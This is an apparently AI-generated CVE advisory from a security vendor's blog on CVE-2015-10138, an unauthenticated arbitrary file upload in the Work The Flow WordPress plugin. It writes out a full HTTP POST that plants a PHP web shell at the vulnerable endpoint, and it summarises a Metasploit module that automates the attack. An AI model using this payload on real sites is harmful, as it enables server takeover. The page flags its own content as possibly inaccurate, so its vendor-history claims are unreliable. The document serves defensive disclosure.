WordPress Work The Flow File Upload (CVE-2015-10138): Unauthenticated Arbitrary File Upload to RCE

A critical flaw in the Work The Flow File Upload plugin for WordPress (≤2.5.2) enables unauthenticated attackers to upload arbitrary files, leading to remote code execution. This post delivers a technical breakdown, PoC, and actionable intelligence for defenders.
CVE Analysis

9 min read

ZeroPath Security Research

ZeroPath Security Research

2025-07-19

WordPress Work The Flow File Upload (CVE-2015-10138): Unauthenticated Arbitrary File Upload to RCE
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

WordPress Work The Flow File Upload (CVE-2015-10138): Unauthenticated Arbitrary File Upload to RCE

When a single HTTP request can grant an attacker full control of your WordPress site, the stakes are clear. CVE-2015-10138 is a textbook example of how a simple file upload flaw can escalate to remote code execution (RCE) and complete server compromise. In this post, we dissect the vulnerability, walk through a real-world proof of concept, and provide actionable intelligence for defenders and incident responders.


Introduction

The Work The Flow File Upload plugin, though not a household name, was used on over a thousand WordPress sites at its peak. Designed to simplify file uploads for end-users, it instead opened the door to unauthenticated arbitrary file uploads due to a critical flaw in its jQuery-File-Upload-9.5.0 component. This vulnerability (CVE-2015-10138) allowed attackers to upload and execute malicious files—most notably, PHP webshells—without any authentication, making it a prime target for mass exploitation campaigns and automated attack tools.

About the Plugin:

  • Work The Flow File Upload: A WordPress plugin aimed at providing user-friendly file upload capabilities. At its peak, it had ~1,000 active installations. Its impact is outsized by the severity of this flaw, as any site running a vulnerable version is at risk of total compromise.

Technical Information

Vulnerability Mechanism

The vulnerability is rooted in the plugin's bundled jQuery-File-Upload-9.5.0 library. The server-side PHP handler at:

/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php

fails to enforce file type validation and does not require authentication. As a result, any remote user can upload arbitrary files—including executable PHP scripts—directly to the server.

Key Technical Weaknesses:

  • No File Type Validation: The upload handler does not restrict file extensions or validate MIME types. Attackers can upload .php files or other executable content.
  • Unauthenticated Access: No authentication or authorization checks are performed on the upload endpoint.
  • Predictable Storage Path: Uploaded files are placed in a known directory: /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/

Exploitation Flow

  1. Crafted HTTP POST: The attacker sends a multipart/form-data POST request to the vulnerable endpoint, specifying a malicious file (e.g., shell.php).
  2. File Upload: The server saves the file in the predictable directory, accessible via the web.
  3. Remote Execution: The attacker accesses the uploaded PHP file via the browser or a direct HTTP request, executing arbitrary code on the server.

Example HTTP Request

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php HTTP/1.1 Host: victim-site.com Content-Type: multipart/form-data; boundary=---------------------------123456789123456 -----------------------------123456789123456 Content-Disposition: form-data; name="files[]"; filename="shell.php" Content-Type: application/octet-stream <?php system($_GET['cmd']); ?> -----------------------------123456789123456--

Root Cause

The root cause is the absence of both server-side file type validation and authentication. The upload handler trusts user input, allowing attackers to bypass any client-side restrictions and upload executable files.


Proof of Concept

The Metasploit module wp_worktheflow_upload.rb targets this vulnerability by automating the attack:

  • It sends a specially crafted HTTP POST request to the plugin's upload endpoint.
  • The request includes a malicious PHP file disguised as an allowed file type.
  • Upon successful upload, the module accesses the file to trigger remote code execution, providing a shell to the attacker.

Attack Steps:

  1. Set the target URL and payload path in Metasploit.
  2. Run the module; it uploads the payload and executes it, granting remote shell access.

This exploit is possible due to the lack of file type validation and authentication in the upload handler.

Reference: Metasploit Module Source


Affected Systems and Versions

  • Product: Work The Flow File Upload plugin for WordPress
  • Affected Versions: Up to and including 2.5.2
  • Vulnerable Component: jQuery-File-Upload-9.5.0 within the plugin
  • Vulnerable Endpoint: /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php
  • Configuration: All default installations of affected versions are vulnerable; no special configuration is required.

Vendor Security History

  • Previous Vulnerabilities: The vendor has a history of critical flaws, including CVE-2014-7840 (file upload bypass) and unpatched high-severity issues.
  • Patch Response: Patch delays ranged from several days to weeks. The fix for CVE-2015-10138 was released in version 2.5.3.
  • Security Maturity: The vendor relied on outdated third-party libraries and ceased maintenance after acquisition, leaving legacy installs exposed.

References

Source: This report was created using AI

If you have suggestions for improvement or feedback, please reach out to us at [email protected]

Detect & fix
what others miss